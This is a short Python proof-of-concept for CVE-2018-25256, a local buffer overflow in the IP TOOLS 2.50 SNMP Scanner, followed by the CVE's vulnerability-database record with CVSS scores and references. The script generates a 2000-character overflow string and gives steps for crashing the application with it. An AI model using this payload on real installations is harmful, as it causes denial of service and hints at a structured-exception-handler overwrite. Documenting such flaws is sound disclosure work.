CVE-2018-25256

# PoC for CVE-2018-25256 - IP TOOLS Buffer Overflow # Usage: Run this script, copy the output, and paste it into the # 'From Addr' and 'To Addr' fields in the SNMP Scanner of IP TOOLS 2.50. # Click the Start button to trigger the crash. import sys def generate_payload(): # Sending a large amount of 'A' characters to trigger the overflow # Adjust length based on specific buffer size (2000 is usually sufficient) return "A" * 2000 if __name__ == "__main__": payload = generate_payload() print("[+] Payload generated:") print(payload) print("\n[+] Paste the payload into the vulnerable fields and click Start.")

{"cve": {"id": "CVE-2018-25256", "sourceIdentifier": "[email protected]", "published": "2026-04-05T21:16:41.033", "lastModified": "2026-04-27T13:11:06.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IP TOOLS 2.50 contains a local buffer overflow vulnerability in the SNMP Scanner component that allows local attackers to crash the application by supplying oversized input. Attackers can paste malicious data into the 'From Addr' and 'To Addr' fields and trigger the crash by clicking the Start button, causing denial of service and SEH overwrite."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ks-soft:ip-tools:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.50", "matchCriteriaId": "3CEE3B8D-E691-40EF-8045-0E23482C6495"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46286", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.ks-soft.net/ip-tools.eng/index.htm", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ip-tools-local-buffer-overflow-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}